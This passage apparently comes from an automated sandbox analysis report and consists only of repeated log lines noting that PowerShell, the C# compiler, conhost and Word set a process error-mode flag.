        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
